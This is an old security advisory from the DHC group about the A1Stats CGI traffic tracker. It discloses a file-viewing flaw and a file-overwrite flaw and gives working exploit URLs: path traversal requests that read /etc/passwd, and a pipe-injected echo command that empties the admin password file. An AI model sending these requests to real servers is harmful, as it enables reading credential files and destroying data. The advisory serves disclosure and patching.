[ Advisory for A1Stats ] [ A1Stats is made by Drummond Miles ] [ Site: http://www.gadnet.com/a1stats ] [ by nemesystm of the DHC ] [ (http://dhcorp.cjb.net - firstname.lastname@example.org) ] [ ADV-0114 ]
/-|=[explanation]=|-\ A1Stats is a CGI package to track website traffic. The package has a view files bug and also gives the possibility to overwrite existing files.
/-|=[who is vulnerable]=|-\ Anyone using a A1Stats that was downloaded before 24/04/01.
/-|=[testing it]=|-\ To test these vulnerabilities, try the following. www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd These two will give you /etc/passwd. www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd This will also give you /etc/passwd but it will show it in a very mangled manner as the CGI adds HTML tags to what it thinks is a file it created itself.
One can also open a file and wreck its contents. http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt| will empty a1admin.txt. a1admin.txt contains the password to change settings of the CGI. When this file is removed, no one can log in anymore.
/-|=[fix]=|-\ Downloading the latest version will solve this problem. Free, encrypted, secure Web-based email at www.hushmail.com